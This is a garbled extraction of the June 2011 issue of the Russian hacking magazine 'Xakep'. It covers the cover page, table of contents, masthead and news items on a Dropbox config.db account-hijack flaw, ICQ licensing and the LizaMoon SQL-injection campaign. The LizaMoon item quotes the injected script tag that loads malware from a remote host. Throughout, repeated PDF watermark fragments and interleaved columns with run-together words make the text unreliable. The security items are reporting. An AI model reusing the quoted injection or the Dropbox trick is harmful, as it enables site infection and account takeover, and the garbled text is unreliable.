Добавил:
Опубликованный материал нарушает ваши авторские права? Сообщите нам.
Вуз: Предмет: Файл:
Скачиваний:
1
Добавлен:
20.04.2024
Размер:
9.56 Mб
Скачать

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

БЕЗОПАСНОСТЬПЛАГИНОВGOOGLE CHROME

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

x

 

 

 

 

 

 

o

 

 

w

 

 

 

 

 

 

 

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-xcha

 

 

 

 

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

 

 

C

 

E

 

 

 

 

 

 

 

X

 

 

 

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

 

 

F

 

 

 

 

 

 

 

t

 

 

 

D

 

 

 

 

 

 

 

 

i

r

РЕКОМЕНДОВАННАЯ

 

 

 

P

 

 

 

 

 

NOW!

o

ЦЕНА

 

 

 

 

to

BUY

 

 

 

 

 

 

 

 

w Click

 

 

 

 

 

 

 

 

m

 

w

 

 

 

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

o

 

 

 

.

 

 

 

 

g

.c

 

:

 

p

df

 

 

 

 

 

 

 

 

 

 

 

n

 

 

 

 

 

 

 

 

-x cha

 

 

 

 

 

 

210

 

 

 

 

 

 

 

 

 

 

 

р

 

 

 

 

 

 

 

 

 

 

 

 

.

 

 

 

 

 

 

 

2011 (149) 06 ИЮНЬ

АХ*NIX’ В БАГИ ИНТЕРЕСНЫЕ АМЫЕC / БЕГА ТАРАКАНЬИ

ИЮНЬ 06 (149) 2011

Тараканьи

áåãà

CÀÌÛÅ

ИНТЕРЕСНЫЕ

ÁÀÃÈ

В *NIX-СИСТЕМАХ

РЕЦЕПТЫ

HTML5

ÑÒÐ. 106

149

 

 

 

 

 

PHP-

 

 

 

 

 

 

 

 

 

 

Silverlight: защита и нападение

Мучаем виртуальную сеть на базе CISCO

ДАЙВИНГ

Внутренности BlackHole exploit kit

 

Обламываем UAC

НИЗКОУРОВНЕВЫЙ ПОИСК

Взлом телеков на базе Linux

БАГОВ В WEB-ПРИЛОЖЕНИЯХ

 

 

 

 

 

ÑÒÐ. 56

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-xcha

 

 

 

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-x cha

 

 

 

 

Журнал Хакер ищет кандидатов на должность редактора рубрики Взлом

Основные приметы:

На вид 18-25 лет

Читает журнал Хакер и мечтает в нем поработать

Знает слова «XSS» и «Heap overflow»

Умеет и любит лечить SQL-инъекции от слепоты

В курсе, чем null-byte отличается от gigabyte

Предпочтет поездку на Black Hat алкотуру в Ебипте

С первого раза отличает хорошую статью от плохой

Способен связать больше 5 слов в читаемое предложение

Готов к жесткой работе по вербовке новых авторов

Умеет читать технические тексты на английском

Обращаться на адрес nikitoz@real.xakep.ru со строкой «VZLOM» в теме письма

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-xcha

 

 

 

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-x cha

 

 

 

 

INTRO

С ЭТОГО МЕСЯЦА У НАС ПРОИЗОШЛО ЗНАЧИТЕЛЬНОЕ ИЗМЕНЕНИЕ В КОМАНДЕ.

Дима «Forb» Докучаев завершил свою работу в роли редактора рубрики «Взлом». Дима — серьезная веха для журнала. Он воспитал на своих статьях целое поколение — сначала как автор, а потом и как редактор рубрики.

Считал тут из интереса, вдумайся: Дима начал работу в журнале 10 лет назад, в 2001 году. За это время он написал в журнал 147 статей общим объемом около 2 млн. символов. Это, на всякий случай, больше двух первых томов «Войны и мира».

За время редакторской работы Дима организовал и отредактировал больше 400 статей общим объемом почти 7 млн. символов — тут уж Лев Николаевич с «Войной» отдыхает два раза.

Но все в мире развивается и когда-либо заканчивается. Закончилась и Димина пора в «Хакере», Диму ждут большие задачи.

Большой респект большому человеку :).

nikitozz, гл. ред. Х http://vkontakte.ru/xakep_mag

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

Content

 

 

 

 

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

n

e

 

 

 

 

 

-xcha

 

 

 

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-x cha

 

 

 

 

MegaNews

004 Всеновоезапоследниймесяц

Ferrum

016 Ноутбукдляработы

Выбираемноутсдиагональюдо14"

021 Золотаяжила

ТестированиеблокапитанияFSP AURUM GOLD 700 (AU-700)

PC_Zone

022 Сигнатурныедела

Анализаторфайловиантивирус— своимируками

026 ParallelsDesktop:

правильнаявиртуализацияподMac

10 советовпоиспользованиювиртуальноймашины

030 Колонкаредактора

ПроHTTP-туннелирование

032 Визуальныескрипты

Sikuli: простаяавтоматизациячерезскриншотыиPython

036 MIX2011

5 самыхзначимыхитоговдевелоперской конференцииMicrosoft

Взлом

038 Easy-Hack

Хакерскиесекретыпростыхвещей

042 Обзорэксплоитов

Анализсвеженькихуязвимостей

048 DNS:обратнаясвязь.Частьвторая

Продвинутыйpayload дляорганизациитуннеля

052 Игрысдомашнейкиской

МучаемдомавиртуальнуюсетьнабазеCisco инетолько

056 PHP-дайвинг

Низкоуровневыйпоискуязвимостейввеб-приложениях

062 Безопасностьплагинов

GoogleChrome

Привычныевекторыатаквконтекстеаддоновдлябраузера

066 X-Tools

Программыдлявзлома

MALWARE

068 Вскрываемэксплойт-пак

РазбираемвнутренностиBlackHole exploit kit

072 Шалостисантивирусами: beginnersedition

ИспытываембазовуюустойчивостьAVG,

Trend Micro иMicrosoft Security Essentials

075 Трендыкиберпреступлений

Немногографикиоcybercrime

Сцена

076 Имянам—легион

Анонимуснепрощает

Юниксойд

082 Гранивиртуальныхмиров

Разбираемсясновымиинеобычнымитехнологиями

виртуализации

088 Тараканьибега

Обзорсамыхинтересныхбаговв*nix’ах

092 Плюшкидлядесктопа

Делаемрабочийстолпрощеиудобнее

Кодинг

098 ОбламываемUAC

Таклистрашнапрограммистусистемаконтроля

пользователей?

102 Silverlight—защитаинападение

ПроблемыбезопасностиSilverlight-контролов

106 РецептыHTML5

ПогружаемсявкодингподHTML5 наконкретныхпримерах

110 Программерскиетипcыитриксы

Делаемкодболеечетким, легкимикрасивым схакерскойточкизрения

SYN/ACK

114 Системапредотвращения вторженийвTMG2010

РазбираемTMG, NIS, GAPA идругиесокращения

120 Параллельныймир

Сравниваемвозможностивиртуальныхмашин

124 Мобильныйконтроль

Делаем«лично-корпоративные» ноутыисмартфоны пользователейбезопасными

PHREAKING

128 HACKTV

Взломтелевизораиизучениеегокишокнапримере

Samsung LE650B

Юниты

134 PSYCHO:Калейдоскопиллюзий

 

Зачастуювсенетак, каккажется…

140

илиностальгияпостатьямКрисаКасперски

FAQUNITED

143

БольшойFAQ

Диско

144

8.5 Гбвсякойвсячины

WWW2

Удобныеweb-сервисы

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-xcha

 

 

 

 

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

C

 

E

 

 

 

 

 

X

 

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

 

F

 

 

 

 

 

 

t

 

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

 

r

 

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

032

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

 

 

 

 

 

 

 

m

 

w

 

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

 

.

 

 

 

 

 

.c

 

 

 

 

p

 

 

 

 

g

 

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

 

-x cha

 

 

 

 

Визуальныескрипты

Sikuli:простаяавтоматизациячерезскриншотыиPython

088

 

 

 

Тараканьибега

 

 

 

Обзорсамыхинтересныхбаговв*nix’ах

 

056

 

 

 

 

 

 

PHP-дайвинг

 

 

Низкоуровневыйпоискуязвимостейвweb-приложениях

/РЕДАКЦИЯ

>Верстальщик

>Администратор

Телефондляжителейрегионовидлязвонков

>Главный редактор

ВераСветлых

ЮлияМалыгина(maligina@glc.ru)

смобильныхтелефонов: 8-800-200-3-999

Никита «nikitozz» Кислицин

/PUBLISHING

>Директоркорпоративнойгруппы

> Äëяписем

(nikitoz@real.xakep.ru)

>Выпускающий редактор

 

(работасрекламнымиагентствами)

101000, Москва, Главпочтамт, а/я 652, Хакер

Николай«gorl»Андреев

>Учредитель

ЛидияСтрекнева(strekneva@glc.ru)

Зарегистрировано в Министерстве

(gorlum@real.xakep.ru)

ООО«ГеймЛэнд»,115280,Москва, ул.Ленинс-

>Старшиеменеджеры

Российской Федерации по делам печати,

 

каяСлобода,19,Омегаплаза,5этаж,офис№21

ИринаКраснокутская

телерадиовещанию и средствам массовых

>Редакторы рубрик

Тел.: (495) 935-7034, факс: (495) 545-0906

НатальяОзира

коммуникаций ПИ Я 77-11802 от 14.02.2002

PC_ZONE иUNITS

>Генеральныйдиректор

КристинаТатаренкова

Отпечатано в типографии «Zapolex»,

Степан«step» Ильин

ДмитрийАгарунов

>Менеджер

Польша.

(step@real.xakep.ru)

>Генеральныйиздатель

НадеждаГончарова

Тираж 219 833 экземпляров.

КОДИНГ, MALWARE иSYN/ACK

ДенисКалинин

>Старшийтрафик-менеджер

Мнение редакции не обязательно совпадает

Александр«Dr. Klouniz» Лозовский

>Зам. генеральногоиздателя

МарьяАлексеева(alekseeva@glc.ru)

(alexander@real.xakep.ru)

АндрейМихайлюк

> ДиректорпопродажерекламынаMANTV

с мнением авторов. Все материалы в

UNIXOID иPSYCHO

>Редакционныйдиректор

МаринаРумянцева

номере предоставляются как информация к

Андрей «Andrushock» Матвеев

ДмитрийЛадыженский

/ОТДЕЛРЕАЛИЗАЦИИ

размышлению. Лица, использующие данную

(andrushock@real.xakep.ru)

>Финансовыйдиректор

информацию в противозаконных целях,

СПЕЦПРОЕКТОВ

могут быть привлечены к ответственности.

>Литературныйредактор

АндрейФатеркин

>Директор

Редакция не несет ответственности за

АннаАранчук

>Директорпоперсоналу

 

ТатьянаГудебская

АлександрКоренфельд

содержание рекламных объявлений в

> DVD

>Менеджеры

номере. За перепечатку наших материалов

>Директорпомаркетингу

Выпускающийредактор

ЕленаКаркашадзе

АлександрГурьяшкин

без спроса — преследуем. Повопросам

Степан«Step» Ильин

>Главныйдизайнер

СветланаМюллер

лицензированияиполученияправна

(step@real.xakep.ru)

ЭндиТернбулл

/РАСПРОСТРАНЕНИЕ

использованиередакционныхматериалов

Unix-раздел

>Директорпопроизводству

журналаобращайтесьпоадресу:

>ДиректорпоДистрибуции

content@glc.ru

Антон «Ant» Жуков

СергейКучерявый

(antitster@gmail.com)

 

КошелеваТатьяна(kosheleva@glc.ru)

 

Security-раздел

/РАЗМЕЩЕНИЕРЕКЛАМЫ

> Руководительотделаподписки

© ÎÎÎ «Ãåéì Ëýíä», РФ, 2011

Дмитрий«D1g1» Евдокимов

Тел.: (495) 935-7034, факс: (495) 545-0906

ГончароваМарина

 

(evdokimovds@gmail.com)

/РЕКЛАМНЫЙОТДЕЛ

> Руководительспецраспространения

 

ЛукичеваНаталья

 

Монтажвидео

>ДиректоргруппыTECHNOLOGY

 

МаксимТрубицын

МаринаКомлева(komleva@glc.ru)

> Претензииидополнительнаяинфа:

 

В случаевозникновениявопросовпокачест-

 

 

 

 

>Редакторxakep.ru

>Старшие менеджеры

вупечатииDVD-дисков: claim@glc.ru.

 

ЛеонидБоголюбов(xa@real.xakep.ru)

ОльгаЕмельянцева(olgaeml@glc.ru)

> Горячаялиния по подписке

 

Факсдляотправкикупоновиквитанцийна

 

/ART

ОксанаАлехина(alekhina@glc.ru)

 

новыеподписки: (495) 545-09-06

 

 

 

>Арт-директор

>Менеджер

Телефонотделаподпискидляжителей

 

Евгений Новиков

ЕленаПоликарпова(polikarpova@glc.ru)

Москвы: (495) 663-82-77

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

C

 

E

 

 

 

 

 

X

 

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

 

F

 

 

 

 

 

 

t

 

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

w Click

to

 

 

 

MEGANEWS

 

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

Мария «Mifrill» Нефедова (mifrill@real.xakep.ru)

 

w

 

 

 

 

 

 

 

o

 

 

 

.

 

 

 

 

 

 

.c

 

 

 

 

p

 

 

 

 

g

 

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

 

-xcha

 

 

 

 

 

Meganews

НАЙДЕНА ДЫРКА В DROPBOX

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-x cha

 

 

 

 

Обо всем за последний месяц

Неприятнаяновостьраспространиласьпоинтернетусоскоростьюлесногопожара: вDropbox, популярнейшемрешениидля синхронизациифайловмежду разнымикомпьютерамиимобильнымиустройствами, обнаружили уязвимость. Найденнаядыра, увы, непустяшная: вседеловфайле config.db, хранящемсяпоадресу

%APPDATA%\Dropbox иявляюще-

мусобойтаблицубазыданных. В

таблицевсеголишьтриполя— email, dropbox_path иhost_id. Последнее поленеотноситсякопределенномухосту, назначаетсясистемепосле первойавторизацииинеменяетсясовременем. Ивотвчемприкол. Для авторизацииDropbox используетименноэтосамоезначениеhost_id,

афайлconfig.db портативенинесвязанссистемой. Получается, что копированиеconfig.db надругуюмашинуизапускDropbox немедленно синхронизируетэтусистемусаккаунтом, безуведомленияпользователя

ибезвнесенияновойсистемывсписокдоверенных! Хужетого, пользовательдаженичегонезаметит, аеслионсменитлогинипароль, тоже ничегонеизменится, — host_id всеравноостанетсявалидным. Ждем малварь, нацеленныйнаconfig.db иhost_id? Кстати, никакихметодов защитыкромезубодробительногошифрованияданныхилиотказаот использованияDropbox’апоканет. Всеподробностивблогеухакера ДерекаНьютона, которыйинашелуязвимость: bit.ly/dropbox_fail.

Infosecurity Europe провела опрос среди людей на улицах Лондона, спрашивая у них, что такое облачная обработка данных. Оказалось, что с

IT-грамотностью у народа очень плохо. 25% ответили, что это «такой датацентр в небе», 20% сказали, что это «какая-то реклама Microsoft», а еще 10% думают, что это «модный клуб в Сохо» :).

МАССОВЫЙ ПЕРЕХОД НА JABBER ОТМЕНЯЕТСЯ

Кактызнаешьизнашихпредыдущихпубликаций, популярныйнапросторахнашейродинымессенджер ICQ, атакжепротоколicq снедавнихпорявляютсясобственностьюинвестиционногофондаMail.ru Group. Признаться, мынеждалиотпродажиаськиничегохорошего, ипонимали, чтосуществуетреальнаяопасностьобъявлениявойныальтернативнымклиентам. Ивойныкудаболеесерьезной, чемвсвоевремявел AOL. Иногдаошибатьсяприятно:). Сталоизвестно, чтотеперьпротоколicq можетспокойноиспользоватьсяв некоммерческихальтернативныхклиентах, ограничениясняты, аальтернативы— полностьюлегализованы. Новую, болеемягкуюверсиюлицензионногосоглашенияужеопубликовалиофициально, найтиееможно наicq.com. Изстарыхограниченийдляразработчиковнекоммерческихприложенийсохранилисьразвечто пункты, связанныеснедопустимостьютакихзлоупотребленийкакизвлечениеинформацииизкаталогови базданныхICQ, массоваярассылканежелательныхсообщенийивведениепользователейвзаблуждение. ГлаваICQ вРоссии, АлександрГорный, особенноподчеркивает: «Легализациявсехсуществующихнасегод- няшнийденьнеофициальныхICQ-клиентов— однаизважнейшихзадачдляMail.Ru Group натекущемэтапе развитияпродукта. Анонсируяновоелицензионноесоглашение, мыхотимещеразофициальноподтвердить готовностькпереговорамипоискуприемлемыхвариантовсотрудничествасдругимиигрокамирынка. Ведь нашаобщаяцель— созданиебезопасныхиудобныхусловийобщениядляпользователей». Кстати, монетизируемыеклиентытоженебылизабытыилизапрещены, сихразработчикамивMail.ru готовыобсудить условияпартнерстваидоговориться.

004

XÀÊÅÐ 06 /149/ 2011

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

C

 

E

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

X

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

 

 

 

 

 

 

 

 

 

 

 

 

F

 

 

 

 

 

 

t

 

 

 

 

 

 

 

 

 

 

 

 

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

r

 

 

 

 

 

 

 

 

 

 

 

 

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

 

 

 

 

 

 

 

 

w Click

to

 

 

 

 

m

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

 

 

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

.

 

 

 

 

 

.c

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

p

 

 

 

 

g

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

-xcha

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-x cha

 

 

 

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

w Click

to

 

 

 

MEGANEWS

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-xcha

 

 

 

 

«ЯБЛОЧНЫЕ» ДИСПЛЕИ С ОБРАТНОЙ СВЯЗЬЮ

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-x cha

 

 

 

 

Ещеоднимпатентомпополнилисьибезтого

хватаетфизическогооткликаотустройства. Ба-

картинкиподпальцами, искладываетсявпечат-

почтибездонныезакромакомпанииApple. Стало

нальныйнабордаженебольшоготекстакрайне

ление, чтотынажимаешьнанастоящиекнопки.

известно, чтояблочныйгигантзапатентовалсен-

утомителен. Apple подалипатентнамеханизм

Что-товродедисплеяБрайлядлянеслепых. Дру-

сорныедисплеисобратнойсвязью. Разумеется,

тактильнойобратнойсвязиещев2009 году, и

гаятехнология, котораятакжеописанавпатенте,

никакихгарантий, чтоужевскоромбудущем

теперьнаконец-тозавершиливсепроцедурыре-

неменееинтересна: подэкраномрасполагается

мыувидимреализациюэтихидейвготовых

гистрации. Изюминкатехнологиизаключаетсяв

структура, создающаявпадины. Принажатиив

продуктах, нет. Носогласись, еслиотбросить

использованиимассивастержней, которыепод-

центртакойвпадины, оналегкоподдается, но

визуальнуюсторонудела, приработестачскри-

нимаютсянадповерхностьюсенсорногоэкрана. принажатиинапериферийнуючасть— ощутимо

ном(привсемегоудобстве) действительноне

Этистержнисоздаютиллюзиюрельефной

сопротивляется.

Марк Шаттлворт сообщил, что уже в осеннем релизе Ubuntu (11.10) пользователи не найдут привычной оболочки GNOME. Теперь ее придется

отдельно скачивать из репозитория и доустанавливать самостоятельно.

СКРИПТ LIZAMOON ПОВСЮДУ

Тыуженавернякаслышалотголоскишумихи, котораясовсемнедавно

вирьподдельный, и, вкачестве«вишенкинаторте», заполнуюверсию

подняласьповсемуинетуиз-заскриптаLizaMoon. Масштабыпоражения

этогофейкапользователюпредлагаетсязаплатить.

действительновпечатляют. МассоваяSQL-инъекциянавеб-приложения,

 

которыеработаютнаплатформеIIS + MS SQL Server, привелакзаражению

 

сотнитысячсайтовповсемумиру. Такиекрупныепрецедентыслучаются,

 

прямоскажем, нечасто. ИнфекциязатронулавосновномСША, Кана-

 

ду, Италию, БразилиюиВеликобританию. Казалосьбы, информацияо

 

LizaMoon широкораспространиласьвСетиипрессе, азначит, эпидемия

 

должнапойтинаспад. Ноничегоподобного. Наданныймоментпоискв

 

Google выдаетболеечем1 500 000 результатов, связанныхсURL, ското-

 

рогоначаласьатака! Впрочем, экспертыуверяют, чтоданныепоисковой

 

выдачи— несамыйнадежныйметодсборастатистики, ивозможно, мас-

 

штабыэпидемиинедотакойстепенивелики. Механизмработымалваря

 

довольнопрост: внедряемыйфайлменяеттекстовыеполявбазеданных,

 

добавляявнихдополнительныйфрагмент<script src=hxxp://lizamoon.

 

com/ur.php></script>, которыйзагружаетвредоноснуюпрограммус

 

удаленногосервера. Затемпользователяперенаправляютнасайт, откуда

 

емузагружаетсяфальшивыйаверWindows Stability Center. Намашине

 

юзера, какпомановениюволшебнойпалочкиоказываетсяцелыйбукет

 

вирусов, итутжепредлагается«спасение» — загрузкаантивирусногоПО.

 

Разумеется, Microsoft никакогоотношениякэтомусайтунеимеет, анти-

 

006

XÀÊÅÐ 06 /149/ 2011

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

 

-

 

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

to

BUY

 

WEXLER.HOME903

 

 

 

 

 

 

 

 

 

 

w Click

 

 

 

 

 

 

m

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

n

e

 

 

 

 

 

-xcha

 

 

 

 

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 
